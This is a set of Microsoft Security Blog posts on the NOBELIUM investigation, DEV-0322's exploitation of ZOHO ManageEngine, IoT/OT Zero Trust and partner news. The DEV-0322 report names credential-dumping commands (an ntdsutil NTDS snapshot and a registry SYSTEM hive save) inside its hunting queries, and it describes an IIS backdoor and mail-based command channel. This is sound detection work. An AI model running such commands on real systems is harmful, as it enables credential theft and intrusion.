The security professional alerted his colleagues, including his supervisor, Charles Carmakal, Mandiant Senior Vice President and Chief Technology Officer. While they didn’t yet know the identity of the adversary, they would come to realize the importance of this initial detection.

Recognizing that his company needed more collaboration and telemetry to better understand the nature of the attack, Carmakal quickly turned to Microsoft. It was about 9:00 PM when Microsoft Detection and Response Team (DART) Lead Dan Taylor received the call asking for help. Dan initially thought Carmakal was joking and when he realized it was serious, he called Microsoft DART Lead Investigator Roberto, who was taking his dog for the last walk of the day, to ask him if he recognized the anomalous code Mandiant had found. Roberto confirmed that he had seen this anomaly during a previous nation-state investigation.

How did the defense team come together?

Every second counts when responding to large-scale cyberattacks like this. NOBELIUM had a year-long advantage on the defenders. A global threat-hunting effort was formed around the Microsoft Threat Intelligence Center, which defends Microsoft and its customers from advanced threat actors around the world. They immediately activated Microsoft’s team of global security experts, who are on-call for major incidents.

Microsoft Security Analyst Joanne was lacing up her hiking boots on a Saturday when she received a text from her supervisor to the entire team that read, “We need all hands on deck for an active incident.” The hike would have to wait as she and her teammates began studying the available data for indicators of an attack.

As Microsoft continued to partner with Mandiant, it quickly became clear that this attack extended well beyond one security company. The Microsoft response team grew along with this knowledge. With every meeting, another 50 to 100 Microsoft threat experts joined in—everyone came together to help. And the industry-wide collaboration grew as well. “Many different partners across the industry came together with a common goal,” said Ramin, Senior Malware Reverse Engineer with the Microsoft Threat Intelligence Center.

The biggest challenge was the sophisticated tradecraft of the attacker. They practiced extreme variability. “It became very clear to us that we were dealing with a highly capable, highly clandestine, and advanced adversary,” said Carmakal. NOBELIUM would never use the same IP address across organizations—even going so far as to change it every time the group re-entered the same organization’s network. That meant that traditional markers—including hashes, file names, and IP addresses—were all brittle indicators and less helpful for tracking the attacker’s path. Over time, they began identifying subtle markers of malicious activity.

The team’s relentless investigation led to a breakthrough—they discovered that the unknown threat actor was stealing credentials and moving through the networks undetected. During the ongoing investigation, the team uncovered that anomalous activity was happening within the SolarWinds platform. After decompiling 50,0000 lines of SolarWind’s code, Mandiant and Microsoft’s reverse engineers identified NOBELIUM malware carefully obfuscated within layers of code, designed to easily spread undetected to thousands of target organizations. “When we found that scope, it was a combination of exciting and scary,” said Pete, Senior Software Engineer of the Microsoft Threat Intelligence Center.

“You got a sense that this attacker could start in hundreds of customer networks, very deep into them with elevated rights,” said John Lambert, General Manager of the Microsoft Threat Intelligence Center. “When you realize how many enterprise customers and government departments use [SolarWinds], you knew that this attacker had achieved a place to have major impact, across the globe.”

Over weeks, the hunters uncovered a sophisticated, advanced threat with a scale and scope beyond anything they could have initially guessed. Now, it was time to use that hard-won knowledge to find and repel the current threat from NOBELIUM and prepare for future attacks.

NOBELIUM lessons

How did cybersecurity professionals identify NOBELIUM as the threat actor behind the attack and what can your organization do to detect and respond to nation-state attacks? In the second episode of our four-part video series “Decoding Nobelium,” security professionals talk about the investigation that followed the discovery of NOBELIUM’s attack. Watch the episode for tips on how to protect your organization against cyberattacks.

Microsoft is committed to helping organizations stay protected from cyberattacks, whether cybercriminal or nation-state. In particular, nation-state adversaries have significant expertise and resources and will develop new attack patterns to further their geopolitical objectives. Consistent with our mission to provide security for all, Microsoft will use our leading threat intelligence and global team of dedicated cybersecurity defenders to help protect our customers and the world. Just two recent examples of Microsoft’s efforts to combat nation-state attacks include a September 2021 discovery, an investigation of a NOBELIUM malware referred to as FoggyWeb, and our May 2021 profiling of NOBELIUM’s early-stage toolset compromising EnvyScout, BoomBox, NativeZone, and VaporRage.

For immediate support, reach out to the Microsoft Security Response Center. Keep an eye out for future posts in the Nobelium nation-state attack series where we share how we fought the NOBELIUM threat and predict the future of cybersecurity. Read our previous post in this series:

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post The hunt for NOBELIUM, the most sophisticated nation-state attack in history appeared first on Microsoft Security Blog.

Categories: cybersecurity Tags:

Threat actor DEV-0322 exploiting ZOHO ManageEngine ADSelfService Plus

November 9th, 2021 No comments

Microsoft has detected exploits being used to compromise systems running the ZOHO ManageEngine ADSelfService Plus software versions vulnerable to CVE-2021-40539 in a targeted campaign. Microsoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to DEV-0322, a group operating out of China, based on observed infrastructure, victimology, tactics, and procedures.

MSTIC previously highlighted DEV-0322 activity related to attacks targeting the SolarWinds Serv-U software with 0-day exploit. As with any observed nation-state actor activity, Microsoft notifies customers that have been targeted or compromised, providing them with the information they need to help secure their accounts.

Our colleagues at Palo Alto Unit 42 have also highlighted this activity in their recent blog. We thank Unit 42 for their collaboration as industry partners and ongoing efforts to protect customers. We would also like to thank our partners in Black Lotus Labs at Lumen Technologies for their contributions to our efforts to track and mitigate this threat.

This blog shares what Microsoft has observed in the latest DEV-0322 campaign and inform our customers of protections in place through our security products. We have not observed any exploit of Microsoft products in this activity.

MSTIC uses DEV-#### designations as a temporary name given to an unknown, emerging, or developing cluster of threat activity, allowing MSTIC to track it as a unique set of information until we can reach high confidence about the origin or identity of the actor behind the activity. Once it meets defined criteria, a DEV group is converted to a named actor.

Activity description

MSTIC first observed the latest DEV-0322 campaign on September 22, 2021, with activity against targets that appear to be in the Defense Industrial Base, higher education, consulting services, and information technology sectors. Following initial exploitation of CVE-2021-40539 on a targeted system, DEV-0322 performed several activities including credential dumping, installing custom binaries, and dropping malware to maintain persistence and move laterally within the network.

Credential dumping

In this campaign, DEV-0322 was observed performing credential dumping using the following commands:

DEV-0322 also occasionally deployed a tool to specifically read security event logs and look for Event ID 4624 events. Next, their tool would collect domains, usernames, and IP addresses and write them to the file elrs.txt. They typically called this tool elrs.exe, and below is an example of how they would call it:

After gaining credentials, DEV-0322 was observed moving laterally to other systems on the network and dropping a custom IIS module with the following command:

Installing custom IIS module

The gac.exe binary installs ScriptModule.dll into the Global Assembly Cache before using AppCmd.exe to install it as an IIS module. AppCmd.exe is a command line tool included in IIS 7+ installations used for server management. This module hooks into the BeginRequest IIS http event and looks for custom commands and arguments being passed via the Cookies field of the HTTP header.

Figure 1: Encoded request from the controller to the victim machine

The custom IIS module supports execution for cmd.exe and PowerShell commands. It also provides DEV-0322 with the ability to direct download and upload of files to and from a compromised IIS web server. The module also observes incoming authentication credentials and captures them; it then encodes these and writes them to the following path:

C:\ProgramData\Microsoft\Crypto\RSA\key.dat

If this module receives the command “ccc,” it drops a file c:\windows\temp\ccc.exe. The file ccc.exe is a .NET program that launches cmd.exe with an argument and sends any output back to the controller.

Figure 2: the Base64-encoded ccc.exe contained inside the IIS module backdoor

Below is an example command from w3wp.exe process after ccc.exe is dropped:

"c:\windows\temp\ccc.exe" dir

Deploying Zebracon malware

In addition to a custom IIS module, DEV-0322 also deployed a Trojan that we are calling Trojan:Win64/Zebracon. This Trojan uses hardcoded credentials to make connections to suspected DEV-0322-compromised Zimbra email servers.

Subsequent commands are made to <ZimbraServer>/service/soap using an obtained authorization token (ZM_AUTH_TOKEN) to perform email operations on the threat actor-controlled mailbox, such as the following:

  • Search email (e.g., <query>(in:\”inbox\” or in:\”junk\”) is:unread</query>)
  • Read email
  • Send email (e.g., Subject: [AutoReply] I’ve received your mail, I will check it soon!)

These operations are used by the Zebracon malware to receive commands from the DEV-0322-controlled mailbox.

Files related to the Zebracon Trojan have the following metadata:

  • Company name:
    • Synacor. Inc.
  • File description:
    • Zimbra Soap Suites
    • Zimbra Soap Tools
  • Internal name:
    • newZimbr.dll
    • zimbra-controller-dll.dll
  • Original filename:
    • newZimbr.dll
    • ZIMBRA-SOAP.DLL

Microsoft will continue to monitor DEV-0322 activity and implement protections for our customers. The current detections, advanced detections, and IOCs in place across our security products are detailed below.

Detections

Microsoft 365 Defender detections

Antivirus 

Microsoft Defender Antivirus detects threat components as the following malware:

  • Trojan:MSIL/Gacker.A!dha
  • Backdoor:MSIL/Kokishell.A!dha
  • Trojan:Win64/Zebracon.A!dha

Endpoint detection and response (EDR) 

Alerts with the following titles in the security center can indicate threat activity on your network:

  • DEV-0322 Actor activity detected​
  • Malware from possible exploitation of CVE-2021-40539

The following alerts may also indicate activity associated with this threat. These alerts can be triggered by unrelated threat activity, but they are listed here for reference:

  • ‘Zebracon’ high-severity malware was detected
  • Anomaly detected in ASEP registry

Microsoft 365 Defender correlates any related alerts into incidents to help customers determine with confidence if observed alerts are related to this activity. Customers using the Microsoft 365 Defender portal can view, investigate, and respond to incidents that include any detections related to this DEV-0322 activity.

The threat and vulnerability management module in Microsoft Defender for Endpoint (included in Microsoft 365 Defender) provides insights related to CVE-2021-40539. Customers can find affected devices in their environment in the Microsoft 365 Defender portal and initiate the appropriate version update of the ManageEngine software. Customers can also use the hunting query included below to identify devices that might be vulnerable to CVE-2021-40539.

Microsoft Sentinel detections

The indicators of compromise (IoCs) included in this blog post are also available to Microsoft Sentinel customers through the Microsoft Emerging Threat Feed located in the Microsoft Sentinel Threat Intelligence blade. These can be used by customers for detection purposes alongside the hunting queries detailed below.

Advanced hunting queries

Microsoft Sentinel hunting queries

Name:  DEV-0322 Command Line Activity November 2021
Description: This hunting query looks for process command line activity related to observed DEV-0322 activity as detailed in this blog post. It locates command lines that are used as part of the threat actor’s post-exploitation activity. The query uses additional data from Microsoft Defender for Endpoint to generate a risk score associated with each result. Hosts with higher risk events should be investigated first.

https://github.com/azure/azure-sentinel/blob/master/Hunting%20Queries/MultipleDataSources/Dev-0322CommandLineActivityNovember2021.yaml

Name:  DEV-0322 File Drop Activity November 2021
Description: This hunting query looks for file creation events related to observed DEV-0322 activity as detailed in this blog. The files this query hunts for are dropped as part of the threat actor’s post-exploitation activity. The query uses other additional data from Microsoft Defender for Endpoint to generate a risk score associated with each result. Hosts with higher risk events should be investigated first.

https://github.com/azure/azure-sentinel/blob/master/Hunting%20Queries/MultipleDataSources/Dev-0322FileDropActivityNovember2021.yaml

In addition to these queries, there are equivalent queries that use the Microsoft Sentinel Information Model (MSIM) to look for the same activity. If you are using MSIM you can find these queries here:

Microsoft 365 Defender hunting queries

Name: Surface devices with the CVE-2021-40539 vulnerability
Description: Use this query to look for devices in your organization that are possibly vulnerable to CVE-2021-40539. Run query.

DeviceTvmSoftwareVulnerabilities
| where CveId == "CVE-2021-40539"
| project DeviceId, DeviceName, CveId, OSPlatform, SoftwareName, SoftwareVersion

Name: Hunt for suspicious dropped files post-exploitation
Description: Look for suspicious files dropped the the threat actor’s post-exploitation activity. Run query.

// Look for the specific files dropped by threat actor
let files = dynamic(["C:\\ProgramData\\Microsoft\\Crypto\\RSA\\key.dat ", "c:\\windows\\temp\\ccc.exe"]);
DeviceFileEvents
| where FileName endswith "elrs.exe" or FolderPath has_any (files)
// Increase the risk score of command accessing file also seen
| join kind=leftouter (DeviceProcessEvents
| where ProcessCommandLine contains "cmd /c elrs.exe") on DeviceId
| project-reorder Timestamp, DeviceName, FileName, FolderPath, ProcessCommandLine, InitiatingProcessAccountName

Name: Hunt for command lines observed used by the DEV-0322 actor
Description: Look for suspicious command lines that are used as part of the threat actor’s post-exploitation activity. Run query.

// Look for command lines observed used by the threat actor
let cmd_lines = dynamic(['cmd.exe /c "wmic /node:redacted process call create "ntdsutil snapshot \\"activate instance ntds\\" create quit quit > c:\\windows\\temp\\nt.dat";', 'regsvr32 /s c:\\windows\\temp\\user64.dll', 'process call  create "cmd /c c:\\windows\\temp\\gac.exe -i c:\\windows\temp\\ScriptModule.dll >c:\\windows\\temp\\tmp.dat"']);
DeviceProcessEvents
// Look for static cmd lines and dynamic one using regex
| where ProcessCommandLine has_any (cmd_lines) or ProcessCommandLine matches regex "save HKLM\\SYSTEM [^ ]*_System.HIV" or InitiatingProcessCommandLine has_any (cmd_lines) or InitiatingProcessCommandLine  matches regex "save HKLM\\SYSTEM [^ ]*_System.HIV"
| summarize count(), FirstSeen=min(Timestamp), LastSeen = max(Timestamp) by DeviceId, DeviceName, ProcessCommandLine, AccountName, FileName, InitiatingProcessCommandLine, InitiatingProcessFileName, InitiatingProcessAccountName, InitiatingProcessAccountSid
// Base risk score on number of command lines seen for each host
| extend RiskScore = count_
| project-reorder  FirstSeen, LastSeen, RiskScore, DeviceName, DeviceId, ProcessCommandLine, AccountName
| extend timestamp = FirstSeen, AccountCustomEntity = AccountName, HostCustomEntity = DeviceName

Indicators of compromise (IOCs)

Type Indicator
SHA-256 bb4765855d2c18c4858dac6af207a4b33e70c090857ba21527dc2b22e19d90b5
SHA-256 e5edd4f773f969d81a09b101c79efe0af57d72f19d5fe71357de10aacdc5473e
SHA-256 79e3f4ef28ab6f118c839d01a404cccae56f4067f3f2d2add3603be5c717932b
SHA-256 a2da9eeb47a0eef4a93873bcc595f8a133a927080a2cd0d3cb4b4f5101a5c5c2
SHA-256 d1d43afd8cab512c740425967efc9ed815a65a8dad647a49f9008732ffe2bb16
SHA-256 3c90df0e02cc9b1cf1a86f9d7e6f777366c5748bd3cf4070b49460b48b4d4090
SHA-256 ae93e2f0b3d0864e4dd8490ff94abeb7279880850b22e8685cd90d21bfe6b1d6
SHA-256 b4162f039172dcb85ca4b85c99dd77beb70743ffd2e6f9e0ba78531945577665
SHA-256 b0a3ee3e457e4b00edee5746e4b59ef7fdf9b4f9ae2e61fc38b068292915d710
SHA-256 bec067a0601a978229d291c82c35a41cd48c6fca1a3c650056521b01d15a72da
SHA-256 1e031d0491cff504e97a5de5308f96dc540d55a34beb5b3106e5e878baf79d59
SHA-256 f757d5698fe6a16ec25a68671460bd10c6d72f972ca3a2c2bf2c1804c4d1e20e
SHA-256 322368e7a591af9d495406c4d9b2461cd845d0323fd2be297ec06ed082ee7428
SHA-256 5fcc9f3b514b853e8e9077ed4940538aba7b3044edbba28ca92ed37199292058
SHA-256 b2a29d99a1657140f4e254221d8666a736160ce960d06557778318e0d1b7423b

 

The post Threat actor DEV-0322 exploiting ZOHO ManageEngine ADSelfService Plus appeared first on Microsoft Security Blog.

Learn how Microsoft strengthens IoT and OT security with Zero Trust

November 8th, 2021 No comments

As cyber threats grow more sophisticated and relentless, the need for Cybersecurity Awareness Month becomes more urgent every year. As part of our year-round commitment to security for all, Microsoft continues to track numerous incidents targeting both digital and physical operations for many organizations. Beyond the usual espionage and data-theft attacks aimed at IT systems, threat actors have increasingly turned their attention toward IoT devices and operational technology (OT) equipment—everything from oil pipelines1 to medical devices.2 Malicious actors have also had success in targeting supply chains, as seen in the insidious Solorigate3 and Kaseya4 attacks.

Earlier this month, we published the 2021 Microsoft Digital Defense Report to help organizations better understand this evolving threat landscape, as well as provide guidance on securing your supply chain and IoT and OT assets. In the spirit of security for all, some highlights of these chapters are presented here for easy reference.

Securing supply chains

The practice of adopting multiple tools to monitor different tiers of suppliers increases complexity, which in turn increases the odds that a cyberattack can produce a significant return for your adversary. Siloes can create additional problems—different teams have different priorities, which may lead to different risk priorities and practices. This inconsistency can create a duplication of efforts and gaps in risk analysis. Suppliers’ personnel also are a top concern. Organizations want to know who has access to their data; so they can protect themselves from human liability, shadow IT, and other insider threats.

For supplier risk management, an always-on, automated, integrated approach is needed, but current processes aren’t well-suited to the task. To secure your supply chain, it’s important to have a repeatable process that will scale as your organization innovates. At Microsoft, we group our investments into nine secure supply chain (SSC) workstreams to methodically evaluate and mitigate risk in each area:

First-party engineering systems for hardware and software, Firmware and driver security, physical security, manufacturing security, logistics security, supplier security, trust chain governance and resilience, security validations and assurances, and monitoring and detections.

Figure 1: Nine areas of investment for a secure end-to-end supply chain.

For supply chain risk management, having integrated solutions and greater visibility into who ultimately has access to an organization’s data are top priorities. While there are many places to begin a Zero Trust journey, instituting multifactor authentication (MFA) should be your first step.

From the White House

On May 12, 2021, the White House issued Executive Order (EO) 14028 on Improving the Nation’s Cybersecurity outlining steps for federal agencies and their technology providers to enhance supply chain security. For software providers, the EO calls for requirements to enhance resistance to attack, including secure software development practices, software verification and vulnerability checks, a software bill of materials (SBOM), a vulnerability disclosure program, and other secure practices.

For federal agency users of software with privileged access, EO 14028 calls for implementing security measures published by the National Institute of Standards and Technology (NIST). Microsoft has long been invested in developing best practices for secure software development, and we’ve contributed to efforts to define industry-wide practices and consensus standards, including through SAFECode, ISO/IEC, and NIST’s National Cybersecurity Center of Excellence (NCCoE) on the Implementing a Zero Trust Architecture project.

IoT and OT security

With the prevalence of cloud connectivity, IoT and OT have become another part of your network. And because IoT and OT devices are typically deployed in diverse environments—from inside factories or office buildings to remote worksites or critical infrastructure—they’re exposed in ways that can make them easy targets. When you add in privacy concerns and regulatory compliance, it’s clear that a holistic approach is needed for enabling seamless security and governance across all your devices.

Securing IoT solutions with a Zero Trust security model is built upon five requirements:

  • Implement strong identity to authenticate devices: Register devices, issue renewable credentials, employ passwordless authentication, and use a hardware root of trust to ensure identity before making decisions.
  • Maintain least privilege access to mitigate blast radius: Implement device and workload access controls to limit any potential damage from identities that may have been compromised, or those running unapproved workloads.
  • Monitor device health to gate access or flag for remediation: Check security configurations, assess for vulnerabilities and insecure passwords, and monitor for active threats and anomalous behavioral alerts to build risk profiles.
  • Deploy continual updates to keep devices healthy: Utilize a centralized configuration and compliance management solution, as well as a robust update mechanism, to ensure devices are up to date and healthy.
  • Maintain security monitoring and response: Employ proactive monitoring to rapidly identify unauthorized or compromised devices.

An attacker can sabotage a factory through IOT through reconnaissance, then email or direct message, then exploit, lateral movement, and then into the factory when the employee transitions to the factory environment after working from home with their IOT or OT device.

Figure 2: How an attacker can get into an enterprise through IoT.

“Attackers will choose the ‘soft targets’ as a point of ingress. Spear phishing or similar attacks allow access to IT systems that can then provide a pathway for attackers to reach OT systems, and the reverse is also possible. In one example, attackers used an aquarium system to access a casino’s high-roller databases, demonstrating that any device with connectivity can present a motivated attacker with an opening.”—2021 Microsoft Digital Defense Report

Default passwords cause problems

Microsoft’s sensor network provides us with raw data on more than 280,000 attacks, including password data. Unsurprisingly, we saw that 96 percent of attacks used a password with fewer than 10 characters. Within these password attempts, only 2 percent included a special character and 72 percent didn’t even contain a number. The word “admin” was found more than 20 million times in IoT passwords over a 45 day period.

We’ve observed the password “admin” used in IOT devices over 20 million times in 45 days of our telemetry. The username “root” was used nearly 10 million times.

Figure 3: Prevalence of common passwords in IoT and OT settings.

Maintain your IoT just like IT

It’s essential for organizations to assess the security of their IoT and OT systems with the same rigor applied to IT systems. While PCs are routinely required to have updated certificates, IoT devices are often deployed with factory-default passwords. Attackers are also focusing on how IoT and OT interact, which brings real dangers. Industrial control systems (ICS) are often retrofitted with remote capabilities—meaning, virtual attacks can cause physical harm.

Microsoft supported a research study conducted by the Global Cyber Alliance (GCA) to demonstrate the effectiveness of commonly recommended controls in preventing attacks. GCA’s analysis of real attack data shows that default passwords factory-set by device manufacturers, or weak passwords set by users, represent the most exploited security vulnerability for IoT devices. Their findings can be boiled down to four simple takeaways for IoT and OT security:

  1. No default passwords.
  2. Implement a vulnerability disclosure policy.
  3. Keep software updated.
  4. Continuously monitor IoT communication for unauthorized communications and attacks.

Learn more

Learn how Microsoft Defender for IoT can secure your IoT and OT devices.

To find out more about protecting your organization against supply chain and IoT/OT attacks, including the seven properties of highly secured devices, download the 2021 Microsoft Digital Defense Report. Also, see our past blog posts providing information for each themed week of Cybersecurity Awareness Month 2021:

Be sure to visit our Cybersecurity Awareness Month page for more resources and information on protecting your organization year-round. Do your part. #BeCyberSmart

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

 


1Hackers Breached Colonial Pipeline Using Compromised Password, William Turton, Kartikay Mehrotra, Bloomberg. 4 June 2021.

2Microsoft Warns of 25 Critical Vulnerabilities in IoT, Industrial Devices, Elizabeth Montalbano, Threatpost. 30 April 2021.

3Deep dive into the Solorigate second-stage activation: From SUNBURST to TEARDROP and Raindrop, Microsoft 365 Defender Research Team, Microsoft Threat Intelligence Center (MSTIC), Microsoft Cyber Defense Operations Center (CDOC), Microsoft Security. 20 January 2021.

4Kaseya ransomware attack sets off race to hack service providers -researchers, Joseph Menn, Reuters. 3 August 2021.

The post Learn how Microsoft strengthens IoT and OT security with Zero Trust appeared first on Microsoft Security Blog.

Categories: cybersecurity Tags:

Discover what’s new and gain technical expertise from MISA at Ignite

November 4th, 2021 No comments

It’s hard to believe we’re so close to the end of another year, and what a year it’s been. For too brief a time in some places, our masks were tossed away, only to find us digging them out of drawers again not long after. But masked up or not, it’s been good to see local restaurants buzzing with activity again, along with fans enjoying sporting events, concerts, and even some shows on Broadway. There’s a sense of expectation in the air, and I’m excited to see what 2022 has in store for all of us.

That renewed optimism can be seen in the continued growth of the Microsoft Intelligent Security Association (MISA) member base—now reaching 275 partners, with 273 product integrations and 243 managed service offerings. We have high expectations for the remainder of this fiscal year, including doubling our membership to roughly 450 as we continue partnering with even more leading-edge cybersecurity firms. We’re also expanding our product portfolio and are excited to announce that two new products for compliance, risk, and privacy are joining the MISA lineup.

Welcoming new compliance, risk, and privacy solutions

Microsoft compliance helps our customers comply with national, regional, and industry-specific requirements governing the collection and use of data. Through MISA, members get support in building managed services and integrations that help them:

  • Identify and remediate critical risks within your organization.
  • Safeguard sensitive data across clouds, apps, and endpoints.
  • Assess compliance and respond to legal and regulatory requirements.

Advanced Audit in Microsoft 365

With Advanced Audit in Microsoft 365, you can conduct forensic and compliance investigations with visibility into user activities across Microsoft 365 services. Using audit log search in the Microsoft 365 compliance center and the Office 365 Management Activity API, Advanced Audit enables audit logs to be retained for up to 10 years, provides access to crucial events that determine the scope of a compromise, and helps with ongoing regulatory, legal, and internal obligations. Customers can specify how long to retain audit records according to a priority level, ensuring that specific policies take priority over others.

“Joining MISA brings our relationship with Microsoft to the next level, enabling seamless integrations for our joint customers using Office 365 and more,” said John Coyle, Vice President Business Development, Sumo Logic. “Our cloud-native integration with Microsoft Office 365’s Advanced Auditing capabilities enables customers to apply Sumo Logic’s powerful Continuous Intelligence Platform and Cloud SIEM, providing clear, detailed trails for rapid investigation of user activity to quickly identify potential breaches and scope of compromise in Microsoft Office 365 data.”

Privacy Management for Microsoft 365

Privacy Management for Microsoft 365 helps companies safeguard personal data and build a privacy resilient workplace by proactively identifying and protecting against privacy risks, such as data hoarding, data transfers, and data oversharing—empowering information workers to make smart data-handling decisions while automating and managing subject requests at scale. Privacy Management is available within the Microsoft 365 compliance center.

With our new Privacy APIs, we’re enabling a broader partner ecosystem to integrate with Privacy Management for Microsoft 365. This integration enables our partners to build solutions that automate the Microsoft 365 portion of subject rights requests. This helps our joint customers ensure that they are compliant with an ever-growing number of regulations across Microsoft 365, as well as non-Microsoft data sources.

“Joining MISA enhances our relationship with Microsoft and our commitment to providing a unified solution for organizations to automate their data security and privacy operations across all their structured and unstructured data systems,” said Vivek Kokkengada, Vice President of Products, Securiti. “Our new integration with Privacy Management for Microsoft 365 using Microsoft’s new Privacy APIs enables our joint customers to automatically fulfill the Microsoft 365 portion of subject rights requests within Privacy Management and ensure compliance with an ever-growing number of privacy regulations globally. Being a MISA member allows us to work closely with the Microsoft teams and stay on the forefront of new strategic integration opportunities to add value to our joint customers.”

Microsoft investing $20 billion in cybersecurity

During the White House Cybersecurity Summit on August 25, 2021, Microsoft Chairman and Chief Executive Officer Satya Nadella shared that the company will quadruple our cybersecurity investments, investing $20 billion to advance our security solutions over the next five years, and $150 million in technical services to help federal, state, and local governments upgrade their security protection. We will also expand partnerships with community colleges and non-profits for cybersecurity training. As many organizations are facing a shortage of cybersecurity professionals, we want to ensure everyone has and uses the protection available today. Watch chairman and president of Microsoft Brad Smith’s video announcement on CNBC.

Lower marketplace fees spur reseller engagement

As software needs rise, customers need to streamline how they buy and deploy software. With more than 30,000 solutions published, the commercial marketplace—Microsoft AppSource and Microsoft Azure Marketplace—is how we connect our customers and partners. To help drive these customer and partner connections, we’ve reduced fees to just 3 percent—down from an industry standard of 20 percent—for every transactable application published in the commercial marketplace. This reduction enables higher margins for partners while simplifying the fee structure.

Independent software vendors (ISVs) with transactable commercial marketplace offers can now set one price for customers and another price for Microsoft Cloud Solution Provider (CSP) partners. This allows ISVs to provide margin to their CSP partners, while CSP partners can also resell outside the commercial marketplace. This added flexibility can help create stronger connections among partners while incentivizing ISVs to share margins with resellers, making it more profitable for partners to sell Microsoft commercial marketplace offers.

Unlock this opportunity and gain access to millions of customers by publishing a solution and selling with us.

Securing the future with Zero Trust

The recent string of disastrous ransomware attacks has shown all too clearly that traditional perimeter-based security can’t keep up with the complexity of today’s decentralized workplace.1 Shadow IT, hybrid work, and the proliferation of endpoints across IoT leave security teams stretched thin. Zero-day vulnerabilities, also known as unknown weaknesses in a network or software, have been implicated in recent attacks where threat actors breached organizations without being detected, giving them ample time to map internal networks, exfiltrate data, and locate additional attack vectors. At least 66 zero-day attacks have been found this year—almost twice the total of the previous year.2

Zero Trust is the essential security strategy for today’s reality. In 2020, the global pandemic compelled nearly every organization to embrace a Zero Trust strategy as employees went remote, virtual private networks (VPNs) were breached or overwhelmed, and digital transformation became critical to organizational sustainability Even the government and businesses worldwide recognized this imperative. In keeping with Section 3 of Executive Order 14028, Microsoft adheres to federal standards for Zero Trust as developed by the National Institute of Standards and Technology (NIST):

  • All resource authentications are dynamic and strictly enforced before allowing access.
  • Trust is evaluated before access is granted, and then only with the least privilege needed to complete the task.
  • Assets should always act as if an attacker is present on the enterprise network.

At Microsoft, we’ve distilled these tenets into three Zero Trust principles: verify explicitly, use least privileged access, and assume breach. These principles form our strategic guidance toward customers, software development, and our global security posture.

Graphic depicting Microsoft's three principles of Zero Trust: Verify explicitly, use least privileged access, and assume breach.

Learn more

To assess your organization’s progress in the Zero Trust journey, use our Zero Trust Assessment tool. If you’d like to learn from our experience, Chief Information Security Officer Bret Arsenault and his team share insights from Microsoft’s Zero Trust journey over at Microsoft Inside Track. Finally, to understand how ISVs can integrate with Microsoft products to create Zero Trust solutions, see our Zero Trust integration guidance.

To learn more about MISA and other new developments, you can view a list of the Microsoft Ignite on-demand sessions here.

To learn more about upcoming big announcements, visit our latest blog posts:

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

 


1What’s Driving the Surge in Ransomware Attacks? Matt Stieb, Intelligencer. 7 September 2021.

22021 has broken the record for zero-day hacking attacks, Patrick Howell O’Neill, MIT Technology Review. 23 September 2021.

The post Discover what’s new and gain technical expertise from MISA at Ignite appeared first on Microsoft Security Blog.

Evolving Zero Trust—Lessons learned and emerging trends

November 3rd, 2021 No comments

Looking back at the last two years, to say that our security strategies have evolved would be an understatement. Organizations around the world made overnight transitions to remote work models in response to a global pandemic, forcing them to reassess attack surface areas as they underwent an accelerated digital transformation. Meanwhile, cybercriminals seized new opportunities—introducing COVID-19-themed social engineering campaigns and accelerated ransomware attacks. Nation-state actors launched increasingly bold and sophisticated nation-state attacks.1

In this environment, security transformation has become key to survival. The mandate to explicitly verify every access request, focus on least privilege access overall, and constantly assume breach to maintain vigilance was made clear, as exemplified by calls from governments and businesses worldwide to accelerate the adoption of Zero Trust strategies.

Sidebar: Zero Trust is a proactive, integrated approach to security across all layers of the digital estate that explicitly and continuously verifies every transaction, asserts least privilege, and relies on intelligence, advanced detection, and real-time response to threats.

The evolution of Zero Trust

Microsoft has embraced Zero Trust to defend our own estate and as a guiding principle for the development of our products. We have also helped thousands of our customers—including Siemens— deploy Zero Trust strategies, accelerate their digital transformation, and increase frequency of advanced attacks using our Zero Trust architecture.

Microsoft Security's Zero Trust architecture flow chart depicting lessons learned from thousands of Zero Trust deployments.

Figure 1: Learnings across thousands of Zero Trust deployments have informed our Zero Trust architecture, which emphasizes the critical importance of integrating policy enforcement and automation, threat intelligence, and threat protection across security pillars.

Lessons learned and emerging trends

Today, we’re publishing the new whitepaper, Evolving Zero Trust, to share the key lessons we’ve learned by embracing Zero Trust at Microsoft and supporting thousands of organizations in their Zero Trust deployments. This informs our beliefs on Zero Trust implementations needed to evolve to adapt and keep organizations protected. We’re also sharing the evolution of our recommended Zero Trust architecture and maturity model that has been informed by these insights.

Highlights from the paper include:

Cover page of Microsoft Security's new whitepaper, Evolving Zero Trust.

  • Lessons from the most successful organizations: The last couple of years have reinforced the importance of applying Zero Trust comprehensively across the digital estate. Organizations that were furthest along in their journeys were more resilient against sophisticated attacks, improved user experiences, and reduced implementation and management costs. We also saw that successful organizations doubled down on automation and a robust Zero Trust governance strategy—both of which can improve security posture and time to remediation while reducing the workload on scarce security personnel.
  • Emerging industry trends: Zero Trust is a dynamic security model that continues to evolve to meet current threats and business realities. Going forward, we will see deeper integration of Zero Trust across pillars—leading to simplified policy automation, more advanced and intelligent threat detection, and more comprehensive attack mitigation. We also predict a wider adoption of the principles behind Zero Trust—verify explicitly, enforce least privilege access, and assume breach—to include the tools and processes used to develop applications, the hybrid and multi-cloud environments in which they run, as well as the application themselves.
  • A more connected Zero Trust architecture: The learnings highlighted above led us to refine our Zero Trust architecture to more emphasize the critical importance of capturing telemetry from across the environment to inform policy decisions, provide better threat intelligence, measure the user experience, and more. The updated architecture showcases the importance of integrating policy enforcement and automation, threat intelligence, and threat protection across security pillars.

This document showcases the incredible evolution and acceleration in the adoption of Zero Trust security strategies. Just a few years ago, Zero Trust was merely a new buzzword for many organizations. Today, 76 percent of large organizations have adopted a Zero Trust approach. We hope that the lessons, trends, and positions we shared in this document are helpful in the planning and application of your own Zero Trust strategy.

The insights and actionable learnings in this document have been provided by a diverse group of customers, partners, and security-focused individuals working across applications, data, endpoint management, identity, infrastructure, networking, threat protection, and our own internal security organization. I’d like to thank our customers and partners for their expertise and insights, as well as my colleagues for their contributions to this whitepaper, architecture, and maturity model guidance.

Learn More

Get the complete  Zero Trust whitepaper for key insights, Zero Trust architecture, and a maturity model to help accelerate your adoption.

